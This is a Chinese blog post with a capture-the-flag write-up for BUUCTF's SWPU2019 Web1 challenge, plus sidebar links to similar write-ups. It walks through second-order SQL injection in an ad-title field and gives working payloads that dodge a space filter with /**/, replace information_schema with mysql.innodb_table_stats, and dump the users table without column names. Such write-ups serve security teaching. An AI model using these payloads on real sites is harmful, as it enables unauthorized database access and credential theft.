buuctf [SWPU2019]Web1 记录

最新推荐文章于 2024-05-14 23:43:15 发布
最新推荐文章于 2024-05-14 23:43:15 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/104783528
版权

注册进去发现可以发广告,这种格式不是sql注入就是xss漏洞。
在这里插入图片描述
在这里插入图片描述
可以发现是存在的。后面用beef发现没用,并不是窃取cookie信息来登录后台

试试sql注入
在标题上进行判断
在这里插入图片描述
可以发现标题存在sql注入,往后面试,发现%23和--+ 不能闭合。
我们可以在后面加上别的
在这里插入图片描述
可以发现,上图''1'' 和这边的'322' 1’是我们输入的内容。
在这里插入图片描述
多加个单引号构造"1"'让语句闭合
在这里插入图片描述
进行联合查询的时候发现过滤了空格
在这里插入图片描述
可以用/**/绕过(之前试试了括号但觉得好奇怪,不理解为什么报错)

1'/**/union/**/select/**/1,2,3/**/'

在这里插入图片描述
往后面一直加,发现加到22列

1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

在这里插入图片描述
发现2,3那可查
查询库名的时候发现被过滤了,
在这里插入图片描述
可能是from和information被过滤了,查资料 (select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats)
学到一个新姿势,mysql.innodb_table_stats查询表名
还可用sys.schema_auto_increment_columns
/****

(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_colum
ns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
,19,20,21,22/**/'

*****/
上面方法行不通做个记录吧

1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

在这里插入图片描述
查询到了表名,接下来可以无列名查询
可参考该链接

1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)b),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'

自己做了一下无列名查询测试,发现那篇wiriteup好像写错了…(不知道是不是对的)

select b from(select 1,2,3 as b 4,5 union select * from users)sdada

当反引号被过滤了,可以使用这个as绕过,查询字段值。(那个writeup查询的结果是4字段的内容,但是他的payload却是3 as b)个人觉得他这里有问题,不对请指正。
在这里插入图片描述

由此可对这题得出payload
用二次注入的方法进行注入

1'/**/union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2,3/**/as/**/a/**/union/**/select/**/*/**/from/**/users)adsa),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'
penson by 小乌
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPU2019]Web1
weixin_45577185的博客
09-12 503
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
[SWPU2019]Web1(sql)
wikey 的博客
03-30 966
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select/爆表名,这里不能使用or,所以这里使用的是新的payload。
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
swpu前端实验4的实验
04-23
课程:Web前端应用开发实验 项目:jQuery基础应用 成绩: 专业班级: 班内序号: 指导教师:杨云 姓名: 学号: 实验日期: 实验目的及要求: 1. 掌握jQuery页面初始化方法:在网页加载完成后执行特定的操作,如...
SWPU学分绩点计算器女生版
02-06
【SWPU学分绩点计算器女生版】是一款专为西南石油大学(SWPU)学生设计的,具有图形用户界面(GUI)的绩点计算工具。它以美观的界面,为女生用户提供了更友好的体验,虽然“女生版”在功能上与普通版本并无本质区别...
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1605
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标题有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
CTF例题:[SWPU2019]Web1(无列名注入)
最新发布
qq_64395221的博客
05-14 930
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名,但没有想要的信息。进入题目后发现有登录和注册接口,直接注册登录。
[SWPU2019]Web1 (bypass information_schema,无列名注入)
qq_52907838的博客
09-26 324
打开环境,是个登录框: 注册账号,登录后,有个广告发布,随便输入后查看详情后会回显: 一下子就会想到是xss,于是我试了一下,果然还真存在xss: 但是后来才知道没用,是个SQL题,注入点在标题那: 按照步骤来,发现or,#都被过滤,空格会被消除,空格简单,用/**/就能绕过,但order by和information_schema都不能用,那咋判断字段数,不会要用union select一个个试吧(那这个题可能要搞傻),其实还可以用group by: 1'/**/group..
BUUCTF [SWPU2019]Web1
qq_56313338的博客
08-27 258
这里将表命名为 x,并且第2个字段命名为a,第三个字段命名b。这是一道sql二次注入题目,但是注入点并不在登录处。获取当前数据库users表的第二列的所有数据。有很多列(我也不知道为啥这么多列…按照猜测,第三列因该就是密码了。admin的密码就是flag。广告申请处进行sql注入。你会发现过滤了很多关键字。就是查询第二列的所有数据。这里用到了一些绕过技巧。注册一个用户然后登录。
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值